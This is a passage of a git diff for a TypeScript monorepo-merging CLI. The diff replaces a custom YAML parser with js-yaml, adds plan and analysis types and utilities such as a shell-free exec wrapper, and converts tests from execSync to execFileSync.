currentArray.push(parseValue(value)); - } - continue; - } - } - - // Handle key-value pairs - if (trimmed.includes(':')) { - const colonIndex = trimmed.indexOf(':'); - const key = trimmed.slice(0, colonIndex).trim(); - const value = trimmed.slice(colonIndex + 1).trim(); - - // Pop stack to find correct parent - while (stack.length > 1 && stack[stack.length - 1].indent >= indent) { - stack.pop(); - } - - const parent = stack[stack.length - 1].obj; - - if (value === '' || value.startsWith('|') || value.startsWith('>')) { - // Nested object or multiline string - const newObj: Record = {}; - parent[key] = newObj; - stack.push({ indent, obj: newObj, key }); - currentArray = null; - currentArrayKey = null; - } else if (value === '[]' || value === '{}') { - parent[key] = value === '[]' ? [] : {}; - } else { - parent[key] = parseValue(value); - } - - // Check if next line starts an array for this key - currentArrayKey = key; - currentArrayIndent = indent; - } - - // Handle array start - if (trimmed.startsWith('- ') && !currentArray) { - // Pop stack to find correct parent - while (stack.length > 1 && stack[stack.length - 1].indent >= indent) { - stack.pop(); - } - - const parent = stack[stack.length - 1].obj; - if (currentArrayKey && parent[currentArrayKey] === undefined) { - const arr: unknown[] = []; - parent[currentArrayKey] = arr; - currentArray = arr; - currentArrayIndent = indent; - - const value = trimmed.slice(2).trim(); - if (value.includes(':')) { - const [objKey, objValue] = value.split(':').map((s) => s.trim()); - const obj: Record = {}; - if (objValue) { - obj[objKey] = parseValue(objValue); - } - currentArray.push(obj); - } else if (value) { - currentArray.push(parseValue(value)); - } - } - } - } - - return result as GitHubWorkflow; -} - -/** - * Parse a YAML value - */ -function parseValue(value: string): unknown { - // Remove quotes - if ((value.startsWith('"') && value.endsWith('"')) || (value.startsWith("'") && value.endsWith("'"))) { - return value.slice(1, -1); - } - - // Parse booleans - if (value === 'true') return true; - if (value === 'false') return false; - - // Parse null - if (value === 'null' || value === '~') return null; - - // Parse numbers - if (/^-?\d+$/.test(value)) return parseInt(value, 10); - if (/^-?\d+\.\d+$/.test(value)) return parseFloat(value); - - return value; + const result = yaml.load(content); + return (typeof result === 'object' && result !== null ? result : {}) as GitHubWorkflow; } /** - * Convert a workflow object back to YAML string + * Convert a workflow object back to YAML string using js-yaml */ -function stringifyYaml(obj: unknown, indent = 0): string { - const prefix = ' '.repeat(indent); - let result = ''; - - if (obj === null || obj === undefined) { - return 'null'; - } - - if (typeof obj !== 'object') { - if (typeof obj === 'string') { - // Quote strings with special characters - if (obj.includes(':') || obj.includes('#') || obj.includes('\n') || obj.startsWith(' ') || obj.includes('\\') || obj.includes('"')) { - // Escape backslashes first, then double quotes - const escaped = obj.replace(/\\/g, '\\\\').replace(/"/g, '\\"'); - return `"${escaped}"`; - } - return obj; - } - return String(obj); - } - - if (Array.isArray(obj)) { - if (obj.length === 0) { - return '[]'; - } - for (const item of obj) { - if (typeof item === 'object' && item !== null) { - result += `${prefix}- `; - const entries = Object.entries(item); - if (entries.length > 0) { - const [firstKey, firstValue] = entries[0]; - result += `${firstKey}: ${stringifyYaml(firstValue, 0)}\n`; - for (let i = 1; i < entries.length; i++) { - const [key, value] = entries[i]; - if (typeof value === 'object' && value !== null) { - result += `${prefix} ${key}:\n${stringifyYaml(value, indent + 2)}`; - } else { - result += `${prefix} ${key}: ${stringifyYaml(value, 0)}\n`; - } - } - } - } else { - result += `${prefix}- ${stringifyYaml(item, 0)}\n`; - } - } - return result; - } - - // Object - const entries = Object.entries(obj); - if (entries.length === 0) { - return '{}'; - } - - for (const [key, value] of entries) { - if (typeof value === 'object' && value !== null) { - if (Array.isArray(value) && value.length === 0) { - result += `${prefix}${key}: []\n`; - } else if (!Array.isArray(value) && Object.keys(value).length === 0) { - result += `${prefix}${key}: {}\n`; - } else { - result += `${prefix}${key}:\n${stringifyYaml(value, indent + 1)}`; - } - } else { - result += `${prefix}${key}: ${stringifyYaml(value, 0)}\n`; - } - } - - return result; +function stringifyYaml(obj: unknown): string { + return yaml.dump(obj, { lineWidth: -1, noRefs: true, quotingType: '"' }); } /** diff --git a/src/types/index.ts b/src/types/index.ts index d5339a3..46df99b 100755 --- a/src/types/index.ts +++ b/src/types/index.ts @@ -363,6 +363,8 @@ export interface AnalyzeResult { hotspots?: DependencyHotspot[]; /** Categorized findings with confidence */ findings?: AnalysisFindings; + /** Extended analysis from Stage 12 analyzers */ + extendedAnalysis?: ExtendedAnalysis; } /** @@ -737,3 +739,389 @@ export interface ConfigureResult { scaffoldedFiles: Array<{ relativePath: string; description: string }>; skippedConfigs: Array<{ name: string; reason: string }>; } + +// ============================================================================ +// Stage 11: Full Lifecycle Plan Types +// ============================================================================ + +/** + * Base interface for all plan artifacts + */ +export interface PlanBase { + /** Schema version for forward compatibility */ + schemaVersion: 1; + /** ISO-8601 creation timestamp */ + createdAt: string; + /** Fields that were redacted (e.g. tokens, paths) */ + redactedFields?: string[]; +} + +/** + * A decision made during plan generation + */ +export interface PlanDecision { + /** Unique identifier */ + id: string; + /** Kind of decision (version-conflict, file-collision, etc.) */ + kind: string; + /** The chosen resolution */ + chosen: string; + /** Other possible resolutions */ + alternatives: string[]; +} + +/** + * A discrete operation within a plan + */ +export interface PlanOperation { + /** Unique identifier */ + id: string; + /** Operation type (copy, write, move, exec, api-call, etc.) */ + type: string; + /** Human-readable description */ + description: string; + /** Input paths or references */ + inputs: string[]; + /** Output paths or references */ + outputs: string[]; +} + +/** + * PreparationPlan wraps PrepareAnalysis into a serializable plan artifact + */ +export interface PreparationPlan extends PlanBase { + /** Checklist items from preparation analysis */ + checklist: PrepCheckItem[]; + /** Patches generated for auto-fixable items */ + patches: PrepPatch[]; + /** Optional workspace clone + apply actions */ + workspaceCloneActions?: Array<{ + repoName: string; + branch: string; + patchFiles: string[]; + }>; +} + +/** + * AddPlan for adding a repo to an existing monorepo + */ +export interface AddPlan extends PlanBase { + /** Source repository being added */ + sourceRepo: RepoSource; + /** Path to target monorepo */ + targetMonorepo: string; + /** Packages subdirectory */ + packagesDir: string; + /** Analysis of the addition */ + analysis: AnalyzeResult; + /** Decisions made during planning */ + decisions: PlanDecision[]; + /** Operations to execute */ + operations: PlanOperation[]; +} + +/** + * ArchivePlan for deprecating old repositories + */ +export interface ArchivePlan extends PlanBase { + /** Repositories to archive */ + repos: Array<{ + name: string; + url: string; + readmePatch: string; + }>; + /** URL of the monorepo these repos migrated to */ + monorepoUrl: string; + /** Optional GitHub API operations (require token) */ + apiOperations?: Array<{ + repo: string; + action: 'archive' | 'update-description'; + }>; +} + +/** + * Strategy for branch migration + */ +export type BranchMigrateStrategy = 'subtree' | 'replay'; + +/** + * BranchPlan for migrating branches between repos + */ +export interface BranchPlan extends PlanBase { + /** Branch name to migrate */ + branch: string; + /** Source repository */ + sourceRepo: string; + /** Target monorepo */ + targetMonorepo: string; + /** Migration strategy */ + strategy: BranchMigrateStrategy; + /** Operations to execute */ + operations: PlanOperation[]; + /** Dry-run report with estimates */ + dryRunReport?: { + commitCount: number; + estimatedTime: string; + contributors: string[]; + }; +} + +/** + * Options for the add command + */ +export interface AddCommandOptions { + /** Path to target monorepo */ + to: string; + /** Packages subdirectory */ + packagesDir: string; + /** Output path for plan JSON */ + out?: string; + /** Apply immediately after planning */ + apply?: boolean; + /** Conflict resolution strategy */ + conflictStrategy: ConflictStrategy; + /** Verbose output */ + verbose?: boolean; + /** Package manager */ + packageManager: PackageManagerType; +} + +/** + * Options for the archive command + */ +export interface ArchiveCommandOptions { + /** URL of the monorepo */ + monorepoUrl: string; + /** Output path for plan JSON */ + out?: string; + /** Apply immediately (requires token) */ + apply?: boolean; + /** Read GitHub token from environment */ + tokenFromEnv?: boolean; + /** Verbose output */ + verbose?: boolean; +} + +/** + * Options for the migrate-branch command + */ +export interface MigrateBranchCommandOptions { + /** Source repository */ + from: string; + /** Target monorepo */ + to: string; + /** Migration strategy */ + strategy: BranchMigrateStrategy; + /** Output path for plan JSON */ + out?: string; + /** Apply immediately */ + apply?: boolean; + /** Verbose output */ + verbose?: boolean; +} + +// ============================================================================ +// Stage 12: Extended Analysis Types +// ============================================================================ + +/** + * Severity of an analysis finding + */ +export type FindingSeverity = 'info' | 'warn' | 'error' | 'critical'; + +/** + * Confidence level for a finding + */ +export type FindingConfidence = 'high' | 'medium' | 'low'; + +/** + * Evidence for an analysis finding + */ +export interface FindingEvidence { + /** File path where evidence was found */ + path: string; + /** Line number, if applicable */ + line?: number; + /** Code snippet or content */ + snippet?: string; +} + +/** + * A single analysis finding with actionable information + */ +export interface AnalysisFinding { + /** Unique identifier (e.g. 'env-node-mismatch') */ + id: string; + /** Human-readable title */ + title: string; + /** Severity level */ + severity: FindingSeverity; + /** Confidence in this finding */ + confidence: FindingConfidence; + /** Supporting evidence */ + evidence: FindingEvidence[]; + /** Suggested action to resolve */ + suggestedAction: string; +} + +/** + * Migration risk classification + */ +export type RiskClassification = 'straightforward' | 'needs-decisions' | 'complex'; + +/** + * Summary of migration risk + */ +export interface RiskSummary { + /** Overall classification */ + classification: RiskClassification; + /** Reasons for this classification */ + reasons: string[]; + /** Top findings driving the classification */ + topFindings: AnalysisFinding[]; +} + +/** + * Extended analysis covering environment, tooling, CI, publishing, and risks + */ +export interface ExtendedAnalysis { + /** Node.js version signals and mismatches */ + environment: AnalysisFinding[]; + /** Package manager detection and inconsistencies */ + packageManager: AnalysisFinding[]; + /** TypeScript, lint, format, test tool detection */ + tooling: AnalysisFinding[]; + /** CI/CD workflow systems and conflicts */ + ci: AnalysisFinding[]; + /** Publishing configuration and recommendations */ + publishing: AnalysisFinding[]; + /** Repository risks (submodules, LFS, large files, case collisions) */ + repoRisks: AnalysisFinding[]; + /** Overall risk summary */ + riskSummary: RiskSummary; +} + +// ============================================================================ +// Stage 14: Configure Engine Types +// ============================================================================ + +/** + * A file patch in a configuration plan + */ +export interface ConfigPatch { + /** File path relative to monorepo root */ + path: string; + /** Content before (null for new files) */ + before?: string; + /** Content after */ + after: string; + /** Human-readable description */ + description: string; +} + +/** + * Configuration plan for workspace scaffolding + */ +export interface ConfigPlan extends PlanBase { + /** File patches to apply */ + patches: ConfigPatch[]; + /** Warnings for configs that can't be safely merged */ + warnings: Array<{ + config: string; + reason: string; + suggestion: string; + }>; +} + +// ============================================================================ +// Stage 15: Dependency Enforcement Types +// ============================================================================ + +/** + * Result of dependency enforcement generation + */ +export interface DependencyEnforcementResult { + /** Overrides/resolutions to add to root package.json */ + overrides: Record; + /** Key name for the PM (pnpm.overrides, resolutions, overrides) */ + overridesKey: string; + /** Internal deps normalized to workspace protocol */ + workspaceProtocolUpdates: Array<{ + packageName: string; + dependency: string; + from: string; + to: string; + }>; +} + +// ============================================================================ +// Stage 18: Smart Defaults Types +// ============================================================================ + +/** + * A suggested decision with evidence + */ +export interface SuggestedDecision { + /** What is being decided */ + topic: string; + /** The suggested value */ + suggestion: string; + /** Confidence level */ + confidence: FindingConfidence; + /** Evidence supporting this suggestion */ + evidence: string[]; + /** Alternative options */ + alternatives: string[]; +} + +/** + * An actionable error with hints + */ +export interface ActionableError { + /** Error message */ + message: string; + /** Error code */ + code?: string; + /** Hint for resolution */ + hint?: string; + /** Related documentation or commands */ + suggestions?: string[]; +} + +// ============================================================================ +// Stage 19: Multi-Language Types +// ============================================================================ + +/** + * Detected language in a repository + */ +export interface LanguageDetection { + /** Repository name */ + repoName: string; + /** Detected languages */ + languages: Array<{ + name: 'go' | 'rust' | 'python' | 'javascript' | 'typescript'; + /** Marker files that indicate this language */ + markers: string[]; + /** Metadata (e.g. module path for Go, crate name for Rust) */ + metadata?: Record; + }>; +} + +// ============================================================================ +// Stage 20: Performance Types +// ============================================================================ + +/** + * Progress event for long-running operations + */ +export interface ProgressEvent { + /** Current step number */ + current: number; + /** Total steps */ + total: number; + /** Label for the current step */ + label: string; + /** Percentage complete (0-100) */ + percentage: number; +} diff --git a/src/utils/cli-options.ts b/src/utils/cli-options.ts new file mode 100644 index 0000000..a85ceb5 --- /dev/null +++ b/src/utils/cli-options.ts @@ -0,0 +1,30 @@ +import type { + ConflictStrategy, + WorkspaceTool, + WorkflowMergeStrategy, +} from '../types/index.js'; + +const CONFLICT_STRATEGIES: readonly ConflictStrategy[] = ['highest', 'lowest', 'prompt']; +const WORKSPACE_TOOLS: readonly WorkspaceTool[] = ['turbo', 'nx', 'none']; +const WORKFLOW_STRATEGIES: readonly WorkflowMergeStrategy[] = ['combine', 'keep-first', 'keep-last', 'skip']; + +export function parseConflictStrategy(input: string): ConflictStrategy | null { + const normalized = input.trim().toLowerCase(); + return (CONFLICT_STRATEGIES as readonly string[]).includes(normalized) + ? (normalized as ConflictStrategy) + : null; +} + +export function parseWorkspaceTool(input: string): WorkspaceTool | null { + const normalized = input.trim().toLowerCase(); + return (WORKSPACE_TOOLS as readonly string[]).includes(normalized) + ? (normalized as WorkspaceTool) + : null; +} + +export function parseWorkflowStrategy(input: string): WorkflowMergeStrategy | null { + const normalized = input.trim().toLowerCase(); + return (WORKFLOW_STRATEGIES as readonly string[]).includes(normalized) + ? (normalized as WorkflowMergeStrategy) + : null; +} diff --git a/src/utils/concurrency.ts b/src/utils/concurrency.ts new file mode 100755 index 0000000..f249e12 --- /dev/null +++ b/src/utils/concurrency.ts @@ -0,0 +1,27 @@ +/** + * Map items through an async function with limited concurrency. + * Like Promise.all but only runs `concurrency` items at a time. + */ +export async function pMap( + items: T[], + fn: (item: T, index: number) => Promise, + concurrency: number = 4, +): Promise { + const results: R[] = new Array(items.length); + let index = 0; + + async function worker(): Promise { + while (index < items.length) { + const i = index++; + results[i] = await fn(items[i], i); + } + } + + const workers = Array.from( + { length: Math.min(concurrency, items.length) }, + () => worker(), + ); + + await Promise.all(workers); + return results; +} diff --git a/src/utils/disk.ts b/src/utils/disk.ts new file mode 100755 index 0000000..ef7fc80 --- /dev/null +++ b/src/utils/disk.ts @@ -0,0 +1,40 @@ +import { execFile } from 'node:child_process'; +import { promisify } from 'node:util'; +import path from 'node:path'; + +const execFileAsync = promisify(execFile); + +/** + * Check available disk space at a given path (cross-platform). + */ +export async function checkDiskSpace( + dirPath: string, +): Promise<{ availableBytes: number; sufficient: boolean; requiredBytes?: number }> { + try { + if (process.platform === 'win32') { + // Use wmic on Windows + const drive = path.parse(path.resolve(dirPath)).root; + const { stdout } = await execFileAsync('wmic', [ + 'logicaldisk', 'where', `DeviceID='${drive.replace('\\', '')}'`, + 'get', 'FreeSpace', '/format:value', + ]); + const match = stdout.match(/FreeSpace=(\d+)/); + const availableBytes = match ? parseInt(match[1], 10) : 0; + return { availableBytes, sufficient: availableBytes > 500_000_000 }; + } else { + // Use df on Unix/macOS + const { stdout } = await execFileAsync('df', ['-k', dirPath]); + const lines = stdout.trim().split('\n'); + if (lines.length >= 2) { + const parts = lines[1].split(/\s+/); + const availableKB = parseInt(parts[3], 10); + const availableBytes = availableKB * 1024; + return { availableBytes, sufficient: availableBytes > 500_000_000 }; + } + return { availableBytes: 0, sufficient: false }; + } + } catch { + // If we can't determine, assume sufficient + return { availableBytes: -1, sufficient: true }; + } +} diff --git a/src/utils/errors.ts b/src/utils/errors.ts new file mode 100755 index 0000000..8befb77 --- /dev/null +++ b/src/utils/errors.ts @@ -0,0 +1,60 @@ +/** + * Thrown instead of calling process.exit() directly, allowing cleanup and testability. + * The top-level CLI handler catches this and calls process.exit(exitCode). + */ +export class CliExitError extends Error { + exitCode: number; + + constructor(exitCode = 1) { + super(`Process exiting with code ${exitCode}`); + this.name = 'CliExitError'; + this.exitCode = exitCode; + } +} + +/** + * An error with an actionable hint for the user. + */ +export class ActionableError extends Error { + hint: string; + + constructor(message: string, hint: string) { + super(message); + this.name = 'ActionableError'; + this.hint = hint; + } +} + +/** + * Shape any error into an ActionableError with a helpful hint. + */ +export function shapeError(err: unknown): ActionableError { + if (err instanceof ActionableError) return err; + + const message = err instanceof Error ? err.message : String(err); + + // Pattern match common errors to provide hints + if (message.includes('ENOENT')) { + return new ActionableError(message, 'Check that the file or directory exists'); + } + if (message.includes('EACCES') || message.includes('EPERM')) { + return new ActionableError( + message, + 'Check file permissions or try running with elevated privileges' + ); + } + if (message.includes('git')) { + return new ActionableError( + message, + 'Ensure git is installed and the repository is valid' + ); + } + if (message.includes('ENOSPC')) { + return new ActionableError( + message, + 'Insufficient disk space. Free up space and try again' + ); + } + + return new ActionableError(message, 'Check the error details above and try again'); +} diff --git a/src/utils/exec.ts b/src/utils/exec.ts new file mode 100755 index 0000000..fd6a8fd --- /dev/null +++ b/src/utils/exec.ts @@ -0,0 +1,63 @@ +import { execFile as nodeExecFile } from 'node:child_process'; +import { promisify } from 'node:util'; + +const execFileAsync = promisify(nodeExecFile); + +export interface ExecResult { + stdout: string; + stderr: string; +} + +export interface ExecOptions { + cwd?: string; + timeout?: number; + env?: Record; + maxBuffer?: number; +} + +/** + * Safe wrapper around child_process.execFile (no shell). + * Prevents shell injection by never invoking a shell interpreter. + */ +export async function safeExecFile( + cmd: string, + args: string[], + options: ExecOptions = {}, +): Promise { + const { cwd, timeout = 60_000, env, maxBuffer = 10 * 1024 * 1024 } = options; + + try { + const result = await execFileAsync(cmd, args, { + cwd, + timeout, + env: env ? { ...process.env, ...env } : undefined, + maxBuffer, + shell: false, + }); + return { + stdout: result.stdout?.toString() ?? '', + stderr: result.stderr?.toString() ?? '', + }; + } catch (err: unknown) { + const error = err as Error & { code?: string; stderr?: string; stdout?: string }; + const message = error.stderr || error.message || 'Command failed'; + throw Object.assign(new Error(`${cmd} ${args.join(' ')}: ${message}`), { + code: error.code, + stdout: error.stdout ?? '', + stderr: error.stderr ?? '', + }); + } +} + +/** + * Check if a command is available on PATH + */ +export async function commandExists(cmd: string): Promise { + try { + const whichCmd = process.platform === 'win32' ? 'where' : 'which'; + await safeExecFile(whichCmd, [cmd], { timeout: 5_000 }); + return true; + } catch { + return false; + } +} diff --git a/src/utils/fs.ts b/src/utils/fs.ts old mode 100644 new mode 100755 index 0d66e8e..7527699 --- a/src/utils/fs.ts +++ b/src/utils/fs.ts @@ -20,6 +20,7 @@ export async function copyDir( ): Promise { await fs.copy(src, dest, { overwrite: true, + dereference: false, filter: options?.filter, }); } @@ -115,3 +116,12 @@ export async function listDirs(dirPath: string): Promise { export async function move(src: string, dest: string): Promise { await fs.move(src, dest, { overwrite: true }); } + +/** + * Normalize a file path to use forward slashes consistently. + * This ensures cross-platform compatibility by replacing both + * the platform separator and backslashes with forward slashes. + */ +export function normalizePath(p: string): string { + return p.replace(/[\\/]+/g, '/'); +} diff --git a/src/utils/index.ts b/src/utils/index.ts index 5f5ff8c..7942d8b 100755 --- a/src/utils/index.ts +++ b/src/utils/index.ts @@ -4,3 +4,8 @@ export * from './validation.js'; export * from './prompts.js'; export * from './operation-log.js'; export * from './redact.js'; +export * from './errors.js'; +export * from './concurrency.js'; +export * from './disk.js'; +export * from './progress.js'; +export * from './cli-options.js'; diff --git a/src/utils/progress.ts b/src/utils/progress.ts new file mode 100755 index 0000000..f5f3b3e --- /dev/null +++ b/src/utils/progress.ts @@ -0,0 +1,50 @@ +import { EventEmitter } from 'node:events'; + +export interface ProgressEvent { + current: number; + total: number; + label: string; + percentage: number; +} + +/** + * Simple progress tracker that emits events as items are processed. + */ +export class ProgressEmitter extends EventEmitter { + private current = 0; + private total: number; + + constructor(total: number) { + super(); + this.total = total; + } + + tick(label: string): void { + this.current++; + const event: ProgressEvent = { + current: this.current, + total: this.total, + label, + percentage: Math.round((this.current / this.total) * 100), + }; + this.emit('progress', event); + + if (this.current >= this.total) { + this.emit('done'); + } + } + + reset(total?: number): void { + this.current = 0; + if (total !== undefined) { + this.total = total; + } + } +} + +/** + * Create a progress emitter. + */ +export function createProgressEmitter(total: number): ProgressEmitter { + return new ProgressEmitter(total); +} diff --git a/src/utils/validation.ts b/src/utils/validation.ts index 1fd3d33..8ec2dbd 100755 --- a/src/utils/validation.ts +++ b/src/utils/validation.ts @@ -168,9 +168,16 @@ const GIT_URL_PATTERNS = [ ]; /** - * Extract repository name from various URL formats + * Extract repository name from various URL/path formats. */ -function extractRepoName(input: string): string { +function extractRepoName(input: string, type: RepoSourceType): string { + if (type === 'local') { + // Handle POSIX, Windows drive, and UNC-style local paths. + const withoutTrailingSlash = input.replace(/[\\/]+$/, ''); + const base = path.basename(withoutTrailingSlash); + return base || 'unknown'; + } + // Remove .git suffix if present let name = input.replace(/\.git$/, ''); @@ -181,8 +188,8 @@ function extractRepoName(input: string): string { } // Handle shorthand notation (owner/repo) - if (name.includes('/')) { - const parts = name.split('/'); + if (name.includes('/') || name.includes('\\')) { + const parts = name.split(/[\\/]/); name = parts[parts.length - 1]; } @@ -201,6 +208,11 @@ function determineSourceType(input: string): RepoSourceType { return 'local'; } + // Windows absolute/UNC paths + if (/^[a-zA-Z]:[\\/]/.test(input) || input.startsWith('\\\\')) { + return 'local'; + } + // Check for GitLab shorthand if (GITLAB_SHORTHAND.test(input)) { return 'gitlab'; @@ -262,7 +274,7 @@ export function parseRepoSource(input: string): RepoSource { const trimmed = input.trim(); const type = determineSourceType(trimmed); const resolved = resolveSource(trimmed, type); - const name = extractRepoName(trimmed); + const name = extractRepoName(trimmed, type); return { type, diff --git a/tests/commands/merge.test.ts b/tests/commands/merge.test.ts index f389427..9a37a22 100644 --- a/tests/commands/merge.test.ts +++ b/tests/commands/merge.test.ts @@ -1,11 +1,20 @@ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; import path from 'node:path'; import fs from 'fs-extra'; -import { execSync } from 'node:child_process'; +import { execFileSync } from 'node:child_process'; +const binPath = path.join(process.cwd(), 'bin', 'monorepo.js'); const fixturesPath = path.join(process.cwd(), 'tests/fixtures'); const outputDir = path.join(process.cwd(), 'tests/.test-output'); +function runMerge(args: string[], opts: Record = {}): string { + return execFileSync('node', [binPath, 'merge', ...args], { + encoding: 'utf-8', + stdio: 'pipe', + ...opts, + }); +} + describe('merge command integration', () => { beforeEach(async () => { await fs.remove(outputDir); @@ -16,10 +25,11 @@ describe('merge command integration', () => { }); it('should create monorepo structure with --dry-run', () => { - const result = execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b --dry-run -o ${outputDir}`, - { encoding: 'utf-8' } - ); + const result = runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '--dry-run', '-o', outputDir, + ]); // Dry run should show the plan expect(result).toContain('Dry Run Report'); @@ -32,10 +42,11 @@ describe('merge command integration', () => { }); it('should merge two repos with -y flag', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b -o ${outputDir} -y --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); + runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '-o', outputDir, '-y', '--no-install', + ]); // Check output structure expect(fs.existsSync(outputDir)).toBe(true); @@ -67,10 +78,12 @@ describe('merge command integration', () => { }); it('should merge three repos', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b ${fixturesPath}/repo-c -o ${outputDir} -y --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); + runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + path.join(fixturesPath, 'repo-c'), + '-o', outputDir, '-y', '--no-install', + ]); expect(fs.existsSync(path.join(outputDir, 'packages/repo-a'))).toBe(true); expect(fs.existsSync(path.join(outputDir, 'packages/repo-b'))).toBe(true); @@ -84,10 +97,11 @@ describe('merge command integration', () => { }); it('should use custom packages directory', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b -o ${outputDir} -p apps -y --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); + runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '-o', outputDir, '-p', 'apps', '-y', '--no-install', + ]); expect(fs.existsSync(path.join(outputDir, 'apps/repo-a'))).toBe(true); expect(fs.existsSync(path.join(outputDir, 'apps/repo-b'))).toBe(true); @@ -100,10 +114,11 @@ describe('merge command integration', () => { }); it('should use highest conflict strategy', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b -o ${outputDir} -y --conflict-strategy highest --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); + runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '-o', outputDir, '-y', '--conflict-strategy', 'highest', '--no-install', + ]); const rootPkg = await fs.readJson(path.join(outputDir, 'package.json')); @@ -114,10 +129,11 @@ describe('merge command integration', () => { }); it('should merge .gitignore files', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b -o ${outputDir} -y --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); + runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '-o', outputDir, '-y', '--no-install', + ]); const gitignore = await fs.readFile( path.join(outputDir, '.gitignore'), @@ -130,7 +146,7 @@ describe('merge command integration', () => { }); it('should show help for merge command', () => { - const result = execSync('node ./bin/monorepo.js merge --help', { + const result = execFileSync('node', [binPath, 'merge', '--help'], { encoding: 'utf-8', }); diff --git a/tests/e2e/analyze-command.test.ts b/tests/e2e/analyze-command.test.ts index a9e1acf..f3c3342 100644 --- a/tests/e2e/analyze-command.test.ts +++ b/tests/e2e/analyze-command.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync } from 'node:child_process'; import fs from 'fs-extra'; import path from 'node:path'; import os from 'node:os'; @@ -65,7 +65,8 @@ describe('analyze command E2E', () => { function runAnalyze(repos: string[], options: string = ''): string { const binPath = path.join(process.cwd(), 'bin', 'monorepo.js'); - return execSync(`node ${binPath} analyze ${repos.join(' ')} ${options}`, { + const args = ['analyze', ...repos, ...options.split(/\s+/).filter(Boolean)]; + return execFileSync('node', [binPath, ...args], { encoding: 'utf-8', stdio: 'pipe', }); diff --git a/tests/e2e/cli.test.ts b/tests/e2e/cli.test.ts index 38f622f..bea2489 100644 --- a/tests/e2e/cli.test.ts +++ b/tests/e2e/cli.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync } from 'node:child_process'; import path from 'node:path'; import fs from 'fs-extra'; import os from 'node:os'; @@ -36,7 +36,7 @@ describe('CLI End-to-End Tests', () => { }); const runCLI = (args: string[], options: { cwd?: string } = {}) => { - return execSync(`node ${CLI_PATH} ${args.join(' ')}`, { + return execFileSync('node', [CLI_PATH, ...args], { cwd: options.cwd || process.cwd(), encoding: 'utf-8', stdio: 'pipe', @@ -45,7 +45,7 @@ describe('CLI End-to-End Tests', () => { const runCLIExpectError = (args: string[], options: { cwd?: string } = {}) => { try { - execSync(`node ${CLI_PATH} ${args.join(' ')}`, { + execFileSync('node', [CLI_PATH, ...args], { cwd: options.cwd || process.cwd(), encoding: 'utf-8', stdio: 'pipe', diff --git a/tests/e2e/init-command.test.ts b/tests/e2e/init-command.test.ts index a27a64b..481d05f 100644 --- a/tests/e2e/init-command.test.ts +++ b/tests/e2e/init-command.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync, execSync } from 'node:child_process'; import fs from 'fs-extra'; import path from 'node:path'; import os from 'node:os'; @@ -29,9 +29,11 @@ describe('init command E2E', () => { await fs.remove(tempDir); }); + const binPath = path.join(process.cwd(), 'bin', 'monorepo.js'); + function runInit(directory: string, options: string = ''): string { - const binPath = path.join(process.cwd(), 'bin', 'monorepo.js'); - return execSync(`node ${binPath} init ${directory} ${options}`, { + const args = ['init', directory, ...options.split(/\s+/).filter(Boolean)]; + return execFileSync('node', [binPath, ...args], { encoding: 'utf-8', stdio: 'pipe', }); diff --git a/tests/e2e/real-repos.test.ts b/tests/e2e/real-repos.test.ts index 043c9ba..f6ef40c 100644 --- a/tests/e2e/real-repos.test.ts +++ b/tests/e2e/real-repos.test.ts @@ -13,7 +13,7 @@ */ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync, execSync } from 'node:child_process'; import path from 'node:path'; import fs from 'fs-extra'; import os from 'node:os'; @@ -37,7 +37,7 @@ describe.skipIf(skipNetworkTests)('Real Repository E2E Tests', () => { }); const runCLI = (args: string[], options: { timeout?: number } = {}) => { - return execSync(`node ${CLI_PATH} ${args.join(' ')}`, { + return execFileSync('node', [CLI_PATH, ...args], { encoding: 'utf-8', stdio: 'pipe', timeout: options.timeout || 120000, // 2 minute default timeout diff --git a/tests/error/filesystem.test.ts b/tests/error/filesystem.test.ts index bef0c39..923351c 100644 --- a/tests/error/filesystem.test.ts +++ b/tests/error/filesystem.test.ts @@ -98,7 +98,7 @@ describe('Filesystem Error Scenarios', () => { await writeFile(longPath, 'content'); } catch (error) { // Should fail with name too long error - expect((error as NodeJS.ErrnoException).code).toMatch(/ENAMETOOLONG|EINVAL/); + expect((error as NodeJS.ErrnoException).code).toMatch(/ENAMETOOLONG|EINVAL|ENOENT/); } }); }); diff --git a/tests/fixtures/repo-monorepo-target/package.json b/tests/fixtures/repo-monorepo-target/package.json new file mode 100755 index 0000000..44ff361 --- /dev/null +++ b/tests/fixtures/repo-monorepo-target/package.json @@ -0,0 +1,12 @@ +{ + "name": "test-monorepo", + "version": "1.0.0", + "private": true, + "workspaces": [ + "packages/*" + ], + "scripts": { + "build": "echo build", + "test": "echo test" + } +} diff --git a/tests/fixtures/repo-monorepo-target/packages/existing-pkg/package.json 